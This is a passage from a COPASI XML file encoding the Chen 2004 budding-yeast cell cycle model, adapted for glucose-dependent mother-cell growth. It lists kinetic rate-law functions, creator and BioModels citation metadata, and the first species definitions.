<ParameterDescription key="FunctionParameter_635" name="CDC20i" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_631" name="IEP" order="1" role="modifier"/>
<ParameterDescription key="FunctionParameter_633" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_629" name="ka20_p" order="3" role="constant"/>
<ParameterDescription key="FunctionParameter_618" name="ka20_p_p" order="4" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_101" name="function_4_Inactivation_2" type="UserDefined" reversible="false">
<Expression>
k*Mass_Action_1(MAD2*cell,CDC20*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_638" name="CDC20" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_632" name="MAD2" order="1" role="modifier"/>
<ParameterDescription key="FunctionParameter_627" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_636" name="k" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_102" name="function_4_CDH1 synthesis" type="UserDefined" reversible="false">
<Expression>
kscdh/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_630" name="cell" order="0" role="volume"/>
<ParameterDescription key="FunctionParameter_639" name="kscdh" order="1" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_103" name="function_4_CDH1 degradation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdcdh,CDH1*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_640" name="CDH1" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_642" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_634" name="kdcdh" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_104" name="function_4_CDH1i degradation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdcdh,CDH1i*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_637" name="CDH1i" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_645" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_643" name="kdcdh" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_105" name="function_4_CDH1i activation" type="UserDefined" reversible="false">
<Expression>
"Michaelis-Menten"(Vacdh,Jacdh,1,CDH1i*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_648" name="CDH1i" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_641" name="Jacdh" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_646" name="Vacdh" order="2" role="constant"/>
<ParameterDescription key="FunctionParameter_650" name="cell" order="3" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_106" name="function_4_Inactivation_3" type="UserDefined" reversible="false">
<Expression>
"Michaelis-Menten"(Vicdh,Jicdh,1,CDH1*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_652" name="CDH1" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_647" name="Jicdh" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_651" name="Vicdh" order="2" role="constant"/>
<ParameterDescription key="FunctionParameter_654" name="cell" order="3" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_107" name="function_4_CDC14 synthesis" type="UserDefined" reversible="false">
<Expression>
ks14/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_644" name="cell" order="0" role="volume"/>
<ParameterDescription key="FunctionParameter_655" name="ks14" order="1" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_108" name="function_4_CDC14 degradation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kd14,CDC14*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_656" name="CDC14" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_658" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_649" name="kd14" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_109" name="function_4_Assoc. with NET1 to form RENT" type="UserDefined" reversible="false">
<Expression>
Mass_Action_2(kasrent,CDC14*cell,NET1*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_653" name="CDC14" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_663" name="NET1" order="1" role="substrate"/>
<ParameterDescription key="FunctionParameter_661" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_659" name="kasrent" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_110" name="function_4_Dissoc. from RENT" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdirent,RENT*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_660" name="RENT" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_665" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_664" name="kdirent" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_111" name="function_4_Assoc with NET1P to form RENTP" type="UserDefined" reversible="false">
<Expression>
Mass_Action_2(kasrentp,CDC14*cell,NET1P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_662" name="CDC14" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_670" name="NET1P" order="1" role="substrate"/>
<ParameterDescription key="FunctionParameter_668" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_666" name="kasrentp" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_112" name="function_4_Dissoc. from RENP" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdirentp,RENTP*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_667" name="RENTP" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_672" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_671" name="kdirentp" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_113" name="function_4_Net1 synthesis" type="UserDefined" reversible="false">
<Expression>
ksnet/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_669" name="cell" order="0" role="volume"/>
<ParameterDescription key="FunctionParameter_673" name="ksnet" order="1" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_114" name="function_4_Net1 degradation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdnet,NET1*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_675" name="NET1" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_677" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_674" name="kdnet" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_115" name="function_4_Net1P degradation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdnet,NET1P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_657" name="NET1P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_680" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_678" name="kdnet" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_116" name="function_4_NET1 phosphorylation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vkpnet,NET1*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_676" name="NET1" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_681" name="Vkpnet" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_683" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_117" name="function_4_dephosphorylation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vppnet,NET1P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_679" name="NET1P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_684" name="Vppnet" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_686" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_118" name="function_4_RENT phosphorylation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vkpnet,RENT*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_682" name="RENT" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_687" name="Vkpnet" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_689" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_119" name="function_4_dephosphorylation_2" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vppnet,RENTP*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_685" name="RENTP" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_690" name="Vppnet" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_692" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_120" name="function_4_Degradation of NET1 in RENT" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdnet,RENT*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_688" name="RENT" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_695" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_693" name="kdnet" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_121" name="function_4_Degradation of NET1P in RENTP" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdnet,RENTP*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_691" name="RENTP" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_698" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_696" name="kdnet" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_122" name="function_4_Degradation of CDC14 in RENT" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kd14,RENT*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_694" name="RENT" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_701" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_699" name="kd14" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_123" name="function_4_Degradation of CDC14 in RENTP" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kd14,RENTP*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_697" name="RENTP" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_704" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_702" name="kd14" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_124" name="function_4_TEM1 activation" type="UserDefined" reversible="false">
<Expression>
"Michaelis-Menten"(LTE1*cell,Jatem,1,TEM1GDP*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_707" name="Jatem" order="0" role="constant"/>
<ParameterDescription key="FunctionParameter_705" name="LTE1" order="1" role="modifier"/>
<ParameterDescription key="FunctionParameter_709" name="TEM1GDP" order="2" role="substrate"/>
<ParameterDescription key="FunctionParameter_700" name="cell" order="3" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_125" name="function_4_inactivation" type="UserDefined" reversible="false">
<Expression>
"Michaelis-Menten"(BUB2*cell,Jitem,1,TEM1GTP*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_710" name="BUB2" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_711" name="Jitem" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_713" name="TEM1GTP" order="2" role="substrate"/>
<ParameterDescription key="FunctionParameter_706" name="cell" order="3" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_126" name="function_4_CDC15 activation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(ka15_p*(TEM1GDP*cell)+ka15_p_p*(TEM1GTP*cell)+ka15p*(CDC14*cell),CDC15i*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_723" name="CDC14" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_725" name="CDC15i" order="1" role="substrate"/>
<ParameterDescription key="FunctionParameter_703" name="TEM1GDP" order="2" role="modifier"/>
<ParameterDescription key="FunctionParameter_719" name="TEM1GTP" order="3" role="modifier"/>
<ParameterDescription key="FunctionParameter_715" name="cell" order="4" role="volume"/>
<ParameterDescription key="FunctionParameter_714" name="ka15_p" order="5" role="constant"/>
<ParameterDescription key="FunctionParameter_717" name="ka15_p_p" order="6" role="constant"/>
<ParameterDescription key="FunctionParameter_721" name="ka15p" order="7" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_127" name="function_4_inactivation_2" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(ki15,CDC15*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_722" name="CDC15" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_718" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_726" name="ki15" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_128" name="function_4_PPX synthesis" type="UserDefined" reversible="false">
<Expression>
ksppx/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_724" name="cell" order="0" role="volume"/>
<ParameterDescription key="FunctionParameter_716" name="ksppx" order="1" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_129" name="function_4_degradation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vdppx,PPX*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_712" name="PPX" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_708" name="Vdppx" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_728" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_130" name="function_4_PDS1 synthesis" type="UserDefined" reversible="false">
<Expression>
(kspds_p+ks1pds_p_p*(SBF*cell)+ks2pds_p_p*(MCM1*cell))/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_737" name="MCM1" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_731" name="SBF" order="1" role="modifier"/>
<ParameterDescription key="FunctionParameter_733" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_720" name="ks1pds_p_p" order="3" role="constant"/>
<ParameterDescription key="FunctionParameter_735" name="ks2pds_p_p" order="4" role="constant"/>
<ParameterDescription key="FunctionParameter_729" name="kspds_p" order="5" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_131" name="function_4_degradation_2" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vdpds,PDS1*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_734" name="PDS1" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_738" name="Vdpds" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_730" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_132" name="function_4_Degradation of PDS1 in PE" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vdpds,PE*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_736" name="PE" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_727" name="Vdpds" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_740" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_133" name="function_4_Assoc. with ESP1 to form PE" type="UserDefined" reversible="false">
<Expression>
Mass_Action_2(kasesp,PDS1*cell,ESP1*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_745" name="ESP1" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_732" name="PDS1" order="1" role="substrate"/>
<ParameterDescription key="FunctionParameter_743" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_741" name="kasesp" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_134" name="function_4_Disso. from PE" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdiesp,PE*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_742" name="PE" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_747" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_746" name="kdiesp" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_135" name="function_4_DNA synthesis" type="UserDefined" reversible="false">
<Expression>
ksori*(eorib5*(CLB5*cell)+eorib2*(CLB2*cell))/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_756" name="CLB2" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_750" name="CLB5" order="1" role="modifier"/>
<ParameterDescription key="FunctionParameter_752" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_754" name="eorib2" order="3" role="constant"/>
<ParameterDescription key="FunctionParameter_744" name="eorib5" order="4" role="constant"/>
<ParameterDescription key="FunctionParameter_748" name="ksori" order="5" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_136" name="function_4_Negative regulation of DNA synthesis" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdori,ORI*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_753" name="ORI" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_749" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_757" name="kdori" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_137" name="function_4_Budding" type="UserDefined" reversible="false">
<Expression>
ksbud*(ebudn2*(CLN2*cell)+ebudn3*(CLN3*cell)+ebudb5*(CLB5*cell))/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_769" name="CLB5" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_759" name="CLN2" order="1" role="modifier"/>
<ParameterDescription key="FunctionParameter_765" name="CLN3" order="2" role="modifier"/>
<ParameterDescription key="FunctionParameter_761" name="cell" order="3" role="volume"/>
<ParameterDescription key="FunctionParameter_767" name="ebudb5" order="4" role="constant"/>
<ParameterDescription key="FunctionParameter_755" name="ebudn2" order="5" role="constant"/>
<ParameterDescription key="FunctionParameter_763" name="ebudn3" order="6" role="constant"/>
<ParameterDescription key="FunctionParameter_739" name="ksbud" order="7" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_138" name="function_4_Negative regulation of Cell budding" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdbud,BUD*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_766" name="BUD" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_762" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_770" name="kdbud" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_139" name="function_4_Spindle formation" type="UserDefined" reversible="false">
<Expression>
ksspn*CLB2/(Jspn+CLB2*cell)
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_768" name="CLB2" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_751" name="Jspn" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_772" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_760" name="ksspn" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_140" name="function_4_Spindle disassembly" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdspn,SPN*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_758" name="SPN" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_774" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_773" name="kdspn" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_141" name="function_4_Growth-hyperbolic" type="UserDefined" reversible="unspecified">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Function_141">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T13:10:32Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
activator*(k*SUB/(Kmsub+SUB))
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_775" name="activator" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_771" name="k" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_777" name="SUB" order="2" role="substrate"/>
<ParameterDescription key="FunctionParameter_779" name="Kmsub" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_45" name="Mass_Action_1" type="UserDefined" reversible="unspecified">
<Expression>
k1*S1
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_380" name="k1" order="0" role="variable"/>
<ParameterDescription key="FunctionParameter_384" name="S1" order="1" role="variable"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_46" name="Mass_Action_2" type="UserDefined" reversible="unspecified">
<Expression>
k1*S1*S2
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_386" name="k1" order="0" role="variable"/>
<ParameterDescription key="FunctionParameter_379" name="S1" order="1" role="variable"/>
<ParameterDescription key="FunctionParameter_377" name="S2" order="2" role="variable"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_47" name="Michaelis-Menten" type="UserDefined" reversible="unspecified">
<Expression>
k1*S1*M1/(J1+S1)
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_374" name="M1" order="0" role="variable"/>
<ParameterDescription key="FunctionParameter_372" name="J1" order="1" role="variable"/>
<ParameterDescription key="FunctionParameter_376" name="k1" order="2" role="variable"/>
<ParameterDescription key="FunctionParameter_382" name="S1" order="3" role="variable"/>
</ListOfParameterDescriptions>
</Function>
</ListOfFunctions>
<Model key="Model_7" name="Chen2004_CellCycle Mother with GLU" simulationType="time" timeUnit="min" volumeUnit="l" areaUnit="m²" lengthUnit="m" quantityUnit="mol" type="deterministic" avogadroConstant="6.02214e+23">
<MiriamAnnotation>
<rdf:RDF
xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#"
xmlns:dcterms="http://purl.org/dc/terms/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:vCard="http://www.w3.org/2001/vcard-rdf/3.0#">
<rdf:Description rdf:about="#Model_7">
<dcterms:bibliographicCitation>
<rdf:Description>
<CopasiMT:isDescribedBy rdf:resource="urn:miriam:pubmed:15169868"/>
</rdf:Description>
</dcterms:bibliographicCitation>
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2006-05-08T11:05:34Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<dcterms:creator>
<rdf:Bag>
<rdf:li>
<rdf:Description>
<vCard:EMAIL>kchen@vt.edu</vCard:EMAIL>
<vCard:N>
<rdf:Description>
<vCard:Family>Chen</vCard:Family>
<vCard:Given>Katherine C</vCard:Given>
</rdf:Description>
</vCard:N>
<vCard:ORG>
<rdf:Description>
<vCard:Orgname>Department of Biology, Virginia Polytechnic Institute</vCard:Orgname>
</rdf:Description>
</vCard:ORG>
</rdf:Description>
</rdf:li>
<rdf:li>
<rdf:Description>
<vCard:EMAIL>lukas@ebi.ac.uk</vCard:EMAIL>
<vCard:N>
<rdf:Description>
<vCard:Family>Endler</vCard:Family>
<vCard:Given>Lukas</vCard:Given>
</rdf:Description>
</vCard:N>
<vCard:ORG>
<rdf:Description>
<vCard:Orgname>EMBL-EBI</vCard:Orgname>
</rdf:Description>
</vCard:ORG>
</rdf:Description>
</rdf:li>
<rdf:li>
<rdf:Description>
<vCard:EMAIL>hdharuri@cds.caltech.edu</vCard:EMAIL>
<vCard:N>
<rdf:Description>
<vCard:Family>Dharuri</vCard:Family>
<vCard:Given>Harish</vCard:Given>
</rdf:Description>
</vCard:N>
<vCard:ORG>
<rdf:Description>
<vCard:Orgname>California Institute of Technology</vCard:Orgname>
</rdf:Description>
</vCard:ORG>
</rdf:Description>
</rdf:li>
</rdf:Bag>
</dcterms:creator>
<dcterms:modified>
<rdf:Description>
<dcterms:W3CDTF>2009-09-17T13:54:43Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:modified>
<CopasiMT:is>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:biomodels.db:BIOMD0000000056"/>
<rdf:li rdf:resource="urn:miriam:kegg.pathway:sce04111"/>
<rdf:li rdf:resource="urn:miriam:taxonomy:4932"/>
<rdf:li>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:biomodels.db:MODEL6624073334"/>
</rdf:Bag>
</rdf:li>
</rdf:Bag>
</CopasiMT:is>
<CopasiMT:isHomologTo rdf:resource="urn:miriam:reactome:REACT_152"/>
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0000278"/>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Comment>
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta name="qrichtext" content="1" /></head><body style="font-size:11pt;font-family:Droid Sans">
<p style="margin-top:18px" dir="ltr"><span style="font-size:16pt;font-weight:600">Mother cell growth & division</span></p>
<p dir="ltr">This is initialized with the conditions at time of division when a new bud is formed. The model follows the mother at time of division.</p>
<p dir="ltr">This model is essentially the Chen 2004 model, adapted to have variable rate of growth (depending on GLU)</p>
<p style="margin-top:18px" dir="ltr"><span style="font-size:13pt">SBML model of Cell cycle control mechanism </span></p>
<p dir="ltr">This is a hypothetical model of the cell cycle control mechanism by Chen et al(2004). The model reproduces the time profiles of the different species in Fig 2 of the paper. The figure depicts the cycle of a daughter cell. Since,the Mass Doubling Time(MDT) is 90 minutes, time t=90 from the model simulation will correspond to time t=0 in the paper. The model was successfully tested using MathSBML and SBML odeSolver. <br />To create valid SBML a local parameter k = 1 was added in reaction: "Inactivation_274_CDC20". </p>
<p dir="ltr">This model originates from BioModels Database: A Database of Annotated Published Models. It is copyright (c) 2005-2010 The BioModels Team. <br />For more information see the <a href="http://www.ebi.ac.uk/biomodels/legal.html">terms of use</a>. <br />To cite BioModels Database, please use <a href="http://www.pubmedcentral.nih.gov/articlerender.fcgi?tool=pubmedpubmedid=16381960">Le Novere N., Bornstein B., Broicher A., Courtot M., Donizelli M., Dharuri H., Li L., Sauro H., Schilstra M., Shapiro B., Snoep J.L., Hucka M. (2006) BioModels Database: A Free, Centralized Database of Curated, Published, Quantitative Kinetic Models of Biochemical and Cellular Systems Nucleic Acids Res., 34: D689-D691.</a> </p>
</body></html>
</Comment>
<ListOfCompartments>
<Compartment key="Compartment_3" name="cell" simulationType="fixed" dimensionality="3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Compartment_3">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0005623" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Compartment>
</ListOfCompartments>
<ListOfMetabolites>
<Metabolite key="Metabolite_49" name="BCK2" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_49">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2011-03-02T13:11:51Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P33306" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[b0],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MASS],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_45" name="BUB2" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_45">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P26448" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_41" name="BUD" simulationType="reactions" compartment="Compartment_3">
